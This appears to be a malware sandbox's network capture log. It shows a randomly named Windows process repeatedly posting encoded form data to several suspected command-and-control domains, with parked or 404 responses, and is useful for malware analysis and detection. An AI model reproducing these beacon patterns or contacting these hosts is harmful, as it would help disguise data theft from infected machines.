                Aug 19, 2024 04:28:53.391957045 CEST | 789 | OUT | POST /ei85/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.telwisey.info
                Origin: http://www.telwisey.info
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 219
                Referer: http://www.telwisey.info/ei85/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Ascii: lH=DTOKciQymv5BY5fNhIMdMs+Vaw8TWrrBnh6daNZgrdcJ0uz/7RUyeXVFAUiDYJx9CEyV0ZVs7PppaTKwEc5MkCpOJAzughTnj18tMg0qYh11pxOMOa5pz26PfMRGlYBWOKKd3RnQfvj5MCvWnAZluo05vhWL5rUiitPZgkwkw5AM1uSfh5RjE/cQegkOxlCk5GEbwW3tcy2Qw03cdU8MQBY=
                Aug 19, 2024 04:28:53.995450974 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                Date: Mon, 19 Aug 2024 02:28:53 GMT
                Server: Apache
                Content-Length: 16026
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                23 | 192.168.2.4 | 61897 | 199.192.19.19 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 19, 2024 04:28:55.918767929 CEST | 10871 | OUT | POST /ei85/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.telwisey.info
                Origin: http://www.telwisey.info
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 10299
                Referer: http://www.telwisey.info/ei85/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Ascii: lH= [TRUNCATED]
                Aug 19, 2024 04:28:56.555280924 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                Date: Mon, 19 Aug 2024 02:28:56 GMT
                Server: Apache
                Content-Length: 16026
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                24 | 192.168.2.4 | 61898 | 199.192.19.19 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 19, 2024 04:28:58.451304913 CEST | 506 | OUT | GET /ei85/?lH=ORmqfURBt40sHMHMpa9bONKIG0NKJL7I9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXnSdkLDuG3HSn8XcjXW0hCgpfinKrOJZMnTQ=&Cj=Qhv8RTO8YPvh6L30 HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.telwisey.info
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Aug 19, 2024 04:28:59.083702087 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                Date: Mon, 19 Aug 2024 02:28:58 GMT
                Server: Apache
                Content-Length: 16026
                Connection: close
                Content-Type: text/html; charset=utf-8
                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                25 | 192.168.2.4 | 61899 | 213.145.228.16 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 19, 2024 04:29:04.244107962 CEST | 772 | OUT | POST /aroo/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.sandranoll.com
                Origin: http://www.sandranoll.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 199
                Referer: http://www.sandranoll.com/aroo/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Ascii: lH=WIabGlVXn4l28+pGdeG8Zps2FJM7dhx91zID6HMSYOPwS730XyIilQdn6KGapwvdKCnGHIONXTeic0sGVguWDD46v/lBsgmAfWOHWmEmkHvgT011bbPCcXxtAE03xj21OgRAtLVZjLr0jArCfCmdWk8dQckXNvpl67hXx2G97sutIYk/KU/L8wFN/pu9VX7/iQ==
                Aug 19, 2024 04:29:04.930221081 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                Date: Mon, 19 Aug 2024 02:29:04 GMT
                Server: Apache/2.4.61 (Debian)
                X-Powered-By: PHP/7.4.33
                Strict-Transport-Security: max-age=63072000; preload
                Connection: Upgrade, close
                Transfer-Encoding: chunked
                Content-Type: text/html; charset=UTF-8
                Data Ascii: 2c4<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>a8dThe Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber k&ouml;nnen Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleit
                Aug 19, 2024 04:29:04.930280924 CEST | 1236 | IN | Data Ascii: ungen einrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso k&ouml;nnen Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes"><table><tr><td><ta
                Aug 19, 2024 04:29:04.930332899 CEST | 1222 | IN | Data Ascii: able></td></tr><tr><td><table><tr><td colspan="2"><h2>Das Modul Datenbanken im Domaintechnik&reg; Hosting Control Panel</h2></td></tr><tr><td style="width:100px;text-align:center;"><img style="display:block;" src="https://www.domaintechnik.at/
                Aug 19, 2024 04:29:04.933170080 CEST | 5 | IN | Data Ascii: 0


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                26 | 192.168.2.4 | 61900 | 213.145.228.16 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 19, 2024 04:29:06.780891895 CEST | 792 | OUT | POST /aroo/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.sandranoll.com
                Origin: http://www.sandranoll.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 219
                Referer: http://www.sandranoll.com/aroo/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Ascii: lH=WIabGlVXn4l2uP5Ga/G8fJs1PpM7Gxxx1zED6Fg8b43wSeL0FzIimQdnxqGbtwvWKFumHJiNXS6ic08GUX6VRD402vlDhAmAfWOHWl4AkBHgTlF1a6PdU3xuDE037D2xOgQVtKJzjJj0jFPCf3Kcck9UUclnHPJ18Zs/v1e6yPSSNe1lblecuwh+iunJYUG25Vqw8KLk+iNSa3QXJBB0KAI=
                Aug 19, 2024 04:29:07.504302025 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                Date: Mon, 19 Aug 2024 02:29:07 GMT
                Server: Apache/2.4.61 (Debian)
                X-Powered-By: PHP/7.4.33
                Strict-Transport-Security: max-age=63072000; preload
                Connection: Upgrade, close
                Transfer-Encoding: chunked
                Content-Type: text/html; charset=UTF-8
                Data Ascii: 49a<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber k&ouml;nnen Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitungen e
                Aug 19, 2024 04:29:07.504343987 CEST | 1236 | IN | Data Ascii: inrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso k&ouml;nnen Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes">836<table><tr><td><ta
                Aug 19, 2024 04:29:07.504379034 CEST | 1093 | IN | Data Ascii: r><td style="width:100px;text-align:center;"><img style="display:block;width:75px;height:75px" src="https://www.domaintechnik.at/fileadmin/gfx/icons/partner.jpg" alt="Affiliate Programm" /></td><td style="width:300px;">Durch einfaches Platzier
                Aug 19, 2024 04:29:07.507680893 CEST | 5 | IN | Data Ascii: 0


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                27 | 192.168.2.4 | 61901 | 213.145.228.16 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 19, 2024 04:29:09.334495068 CEST | 10874 | OUT | POST /aroo/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.sandranoll.com
                Origin: http://www.sandranoll.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 10299
                Referer: http://www.sandranoll.com/aroo/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 6c 48 3d 57 49 61 62 47 6c 56 58 6e 34 6c 32 75 50 35 47 61 2f 47 38 66 4a 73 31 50 70 4d 37 47 78 78 78 31 7a 45 44 36 46 67 38 62 37 58 77 53 73 7a 30 47 55 63 69 6e 51 64 6e 38 4b 47 65 74 77 76 4c 4b 45 4b 71 48 4a 2f 32 58 51 79 69 65 58 6b 47 46 56 43 56 4c 54 34 30 2b 50 6c 47 73 67 6d 76 66 57 65 44 57 6c 6f 41 6b 42 48 67 54 6d 64 31 63 72 50 64 53 33 78 74 41 45 30 7a 78 6a 32 56 4f 67 35 75 74 4b 4e 4a 67 39 76 30 6a 6c 2f 43 64 68 65 63 42 55 39 57 5a 38 6c 2f 48 50 45 79 38 5a 41 64 76 32 43 63 79 49 36 53 4d 61 6f 76 42 30 2b 2f 33 6d 68 68 31 4d 36 7a 55 6e 4b 50 79 55 6d 71 79 4b 62 63 69 41 4a 46 53 77 42 42 51 44 68 48 58 47 71 30 53 53 48 44 71 62 4a 64 41 73 31 59 78 53 51 6a 74 32 78 4d 4c 6f 71 35 75 6c 36 54 73 62 37 44 4e 45 74 6e 4b 58 62 38 68 72 50 54 4a 35 61 75 45 4c 46 52 31 6c 32 6e 48 55 62 52 66 2b 37 54 56 76 42 4a 38 35 78 2f 4c 58 6b 6e 4f 52 41 4b 63 38 75 73 51 42 32 6d 79 36 6a 42 33 4f 4f 6d 41 6d 65 77 51 75 34 36 39 5a 73 63 50 47 78 43 46 4a 4a 30 5a 61 53 [TRUNCATED]
                Data Ascii: lH=WIabGlVXn4l2uP5Ga/G8fJs1PpM7Gxxx1zED6Fg8b7XwSsz0GUcinQdn8KGetwvLKEKqHJ/2XQyieXkGFVCVLT40+PlGsgmvfWeDWloAkBHgTmd1crPdS3xtAE0zxj2VOg5utKNJg9v0jl/CdhecBU9WZ8l/HPEy8ZAdv2CcyI6SMaovB0+/3mhh1M6zUnKPyUmqyKbciAJFSwBBQDhHXGq0SSHDqbJdAs1YxSQjt2xMLoq5ul6Tsb7DNEtnKXb8hrPTJ5auELFR1l2nHUbRf+7TVvBJ85x/LXknORAKc8usQB2my6jB3OOmAmewQu469ZscPGxCFJJ0ZaSUSbYS9mNWDQskxIqkVMN/xQd5Fuo65yYaH/k1IDUF/6h0//CqVSpR3EF1wEzYDSnHqwpwFyOZ8HVoSX21Q/aUYy4hK8P40IlK64nTfBzIiIPaC9rAVF9sbPwFIirOjON2AeynqgZYHiNGGAEbUFyS4FwXACLgv+DxYxKSQdJM7tLVuE4x3lqgXUMyeLjFhS2UFFJMsIfuVUc/F0IvX6nvOYRYoai/j/9Njkil3cZo0XUCAszLSVoGSqZmsJAUfLQ4Di+qUYzL1vCv9qX+bYJi/KMR2rQkmDq8FOIJ7jS1Aw7R2X6CY96d3BRnAD6UBPigfN+TB3Z5BgzLZkBz5ndMhfh2HT7v11upi5YwddLq+oj3tSjwTJTnSpxwY8dv+deJyN3fjDUKN8WrLhQ9dosHSqcsUY5nsqSHIUsKfSmZ57o2KdqIIrXzb0dVPgS/jHn4YOpGv3VaJOeayEP0jo9/Z5Vj1BqVrTJZ7z1Y+93BxC4cyPbmOqmxxkRHBPyI6m1kdLM6P4K14/5gi4sToR/pHXDFa9g31MJeIhpZn2xIMybVxidWwKlQXlxnyi87y99DrnJkFkTicYzp09pxdPibsTPWuGIrMowUFC7AkJcU6VegnjSwLN9Zx0nRVRt6eHuGwapmD3tFoNWaQj3zncN8bLIawM82V8sdc [TRUNCATED]
                Aug 19, 2024 04:29:10.035621881 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                Date: Mon, 19 Aug 2024 02:29:09 GMT
                Server: Apache/2.4.61 (Debian)
                X-Powered-By: PHP/7.4.33
                Strict-Transport-Security: max-age=63072000; preload
                Connection: Upgrade, close
                Transfer-Encoding: chunked
                Content-Type: text/html; charset=UTF-8
                Data Raw: 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 63 39 63 0d 0a 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 [TRUNCATED]
                Data Ascii: ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>c9cDomain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber k&ouml;nnen Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitu
                Aug 19, 2024 04:29:10.035643101 CEST | 1236 | IN | Data Raw: 6e 67 65 6e 20 65 69 6e 72 69 63 68 74 65 6e 2c 20 57 65 62 68 6f 73 74 69 6e 67 20 62 65 73 74 65 6c 6c 65 6e 20 75 6e 64 20 56 69 65 6c 65 73 20 6d 65 68 72 2e 3c 62 72 20 2f 3e 45 62 65 6e 73 6f 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65
                Data Ascii: ngen einrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso k&ouml;nnen Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes"><table><tr><td><tab
                Aug 19, 2024 04:29:10.035659075 CEST | 1236 | IN | Data Raw: 70 61 6e 3d 22 32 22 3e 3c 68 32 3e 44 61 73 20 53 6f 66 74 77 61 72 65 20 4d 6f 64 75 6c 20 69 6d 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 26 72 65 67 3b 20 48 6f 73 74 69 6e 67 20 43 6f 6e 74 72 6f 6c 20 50 61 6e 65 6c 3c 2f 68 32 3e 3c 2f 74
                Data Ascii: pan="2"><h2>Das Software Modul im Domaintechnik&reg; Hosting Control Panel</h2></td></tr><tr><td style="width:100px;text-align:center;"><img style="display:block;" src="https://www.domaintechnik.at/fileadmin/gfx/icons/cp/64x64/hosted_soft.png"
                Aug 19, 2024 04:29:10.035671949 CEST | 6 | IN | Data Raw: 74 6d 6c 3e 0d 0a
                Data Ascii: tml>
                Aug 19, 2024 04:29:10.041949034 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                28 | 192.168.2.4 | 61902 | 213.145.228.16 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 19, 2024 04:29:11.877254009 CEST | 507 | OUT | GET /aroo/?Cj=Qhv8RTO8YPvh6L30&lH=bKy7FSIHmKYFjPoOU8uZGqQpeblpEQl2twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGH0ELwMgy3j7Qb0m6Rmga/hvJBmgScr7TS3s= HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.sandranoll.com
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Aug 19, 2024 04:29:12.619221926 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                Date: Mon, 19 Aug 2024 02:29:12 GMT
                Server: Apache/2.4.61 (Debian)
                X-Powered-By: PHP/7.4.33
                Strict-Transport-Security: max-age=63072000; preload
                Connection: Upgrade, close
                Transfer-Encoding: chunked
                Content-Type: text/html; charset=UTF-8
                Data Raw: 34 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 [TRUNCATED]
                Data Ascii: 49a<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber k&ouml;nnen Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitungen e
                Aug 19, 2024 04:29:12.619275093 CEST | 1236 | IN | Data Raw: 69 6e 72 69 63 68 74 65 6e 2c 20 57 65 62 68 6f 73 74 69 6e 67 20 62 65 73 74 65 6c 6c 65 6e 20 75 6e 64 20 56 69 65 6c 65 73 20 6d 65 68 72 2e 3c 62 72 20 2f 3e 45 62 65 6e 73 6f 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 6f 6e 6c 69 6e
                Data Ascii: inrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso k&ouml;nnen Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes">815<table><tr><td><ta
                Aug 19, 2024 04:29:12.619313002 CEST | 1060 | IN | Data Raw: 77 61 72 65 3c 2f 68 32 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 22 3e 3c 69 6d 67 20 73 74 79 6c 65 3d 22 64 69 73 70
                Data Ascii: ware</h2></td></tr><tr><td style="width:100px;text-align:center;"><img style="display:block;" src="https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/mediawiki.png" alt="MediaWiki" /></td><td style="width:300px;">Die Wiki Software f&u
                Aug 19, 2024 04:29:12.624816895 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                29 | 192.168.2.4 | 61903 | 91.195.240.19 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 19, 2024 04:29:17.719985962 CEST | 772 | OUT | POST /tf44/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.gipsytroya.com
                Origin: http://www.gipsytroya.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 199
                Referer: http://www.gipsytroya.com/tf44/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
